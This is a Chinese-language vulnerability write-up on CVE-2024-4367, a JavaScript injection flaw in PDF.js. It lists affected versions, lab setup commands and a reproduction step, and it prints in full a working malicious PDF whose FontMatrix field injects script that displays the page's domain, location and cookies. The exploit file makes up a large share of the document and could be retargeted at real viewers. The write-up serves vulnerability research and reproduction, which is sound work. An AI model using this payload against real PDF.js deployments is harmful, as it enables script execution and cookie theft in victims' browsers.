# PDF.js 任意 JavaScript 代码执行 CVE-2024-4367 ## 漏洞描述 PDF.js 是 Mozilla 推出的一款开源 PDF 文件阅读器。其 4.1.392 版本及以前,PDF.js 中存在一处 JavaScript 代码注入漏洞。 参考链接: - https://codeanlabs.com/blog/research/cve-2024-4367-arbitrary-js-execution-in-pdf-js/ - https://github.com/mozilla/pdf.js/archive/refs/tags/v4.1.392.zip ## 漏洞影响 影响版本: ``` v4.1.392 (released April 11, 2024): 受影响 (release before this bug was fixed) v1.10.88 (released Oct 27, 2017): 受影响 (re-introduces the security vulnerability due to a typo fix) v1.4.20 (released Jan 27, 2016): 受影响 (release before the next release that accidentally fixed the vulnerable code) v0.8.1181 (released Apr 10, 2014): 受影响 (first public release of PDF.js) ``` 安全版本: ``` v4.2.67 (released April 29, 2024): 不受影响 (fixed) v1.9.426 (released Aug 15, 2017): 不受影响 (release before the next affected version) v1.5.188 (released Apr 21, 2016): 不受影响 (mitigated the security vulnerability by an accidental typo) ``` ## 环境搭建 Vulhub 执行如下命令启动一个使用了 PDF.js 4.1.392 的服务器: ``` docker compose up -d ``` 服务启动后,访问`http://your-ip:8080`可以看到一个上传页面。 > 2024/05/27_15:30:25.85 > Vulhub 拉取镜像未成功,源码搭建环境: ``` wget https://github.com/mozilla/pdf.js/archive/refs/tags/v4.1.392.zip unzip v4.1.392.zip cd pdf.js-4.1.392 npm install -g gulp-cli@^2.3.0 npm install gulp server ``` > vps 需要修改 `./pdf.js-4.1.392/test/webserver.mjs`,将 `localhost` 改为 `0.0.0.0`: ``` this.host = host || "0.0.0.0"; ``` ## 漏洞复现 上传恶意PDF文件[poc.pdf](https://github.com/vulhub/vulhub/blob/master/pdfjs/CVE-2024-4367/poc.pdf),即可触发XSS弹窗。 ![](images/PDF.js%20任意%20JavaScript%20代码执行%20CVE-2024-4367/image-20240527152556731.png) ## 漏洞POC poc.pdf ``` %PDF-1.4 % 8 0 obj << /PatternType 2 /Shading<< /Function<< /Domain[0 1] /C0[0 0 1] /C1[1 0.6 0] /N 1 /FunctionType 2 >> /ShadingType 2 /Coords[46 400 537 400] /Extend[false false] /ColorSpace/DeviceRGB >> /Type/Pattern >> endobj 5 0 obj << /Widths[573 0 582 0 548 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 573 0 573 0 341] /Type/Font /BaseFont/PAXEKO+SourceSansPro-Bold /LastChar 102 /Encoding/WinAnsiEncoding /FontMatrix [0.1 0 0 0.1 0 (1\); \nalert\('document.domain: '+window.document.domain+'\\nlocation: '+window.location+'\\ncookie: '+window.document.cookie)] /Subtype/Type1 /FirstChar 65 /FontDescriptor 9 0 R >> endobj 2 0 obj << /Kids[3 0 R] /Type/Pages /Count 1 >> endobj 9 0 obj << /Type/FontDescriptor /ItalicAngle 0 /Ascent 751 /FontBBox[-6 -12 579 713] /FontName/PAXEKO+SourceSansPro-Bold /StemV 100 /CapHeight 713 /Flags 32 /FontFile3 10 0 R /Descent -173 /MissingWidth 250 >> endobj 6 0 obj << /Length 128 >> stream 47 379 489 230 re S /Pattern cs BT 50 500 Td 117 TL /F1 150 Tf /P1 scn (AbCdEf) Tj /P2 scn (AbCdEf) ' ET endstream endobj 3 0 obj << /Type/Page /Resources 4 0 R /Contents 6 0 R /Parent 2 0 R /MediaBox[0 0 595.2756 841.8898] >> endobj 10 0 obj << /Length 800 /Subtype/Type2 >> stream endstream endobj 7 0 obj << /PatternType 1 /Matrix[1 0 0 1 50 0] /Length 58 /TilingType 1 /BBox[0 0 16 16] /YStep 16 /PaintType 1 /Resources<< >> /XStep 16 >> stream 0.65 g 0 0 16 16 re f 0.15 g 0 0 8 8 re f 8 8 8 8 re f endstream endobj 4 0 obj << /Pattern<< /P1 7 0 R /P2 8 0 R >> /Font<< /F1 5 0 R >> >> endobj 1 0 obj << /Pages 2 0 R /Type/Catalog /OpenAction[3 0 R /Fit] >> endobj xref 0 11 0000000000 65535 f 0000002260 00000 n 0000000522 00000 n 0000000973 00000 n 0000002178 00000 n 0000000266 00000 n 0000000794 00000 n 0000001953 00000 n 0000000015 00000 n 0000000577 00000 n 0000001085 00000 n trailer << /ID[(w4f) (w4f)] /Root 1 0 R /Size 11 >> startxref 2333 %%EOF ```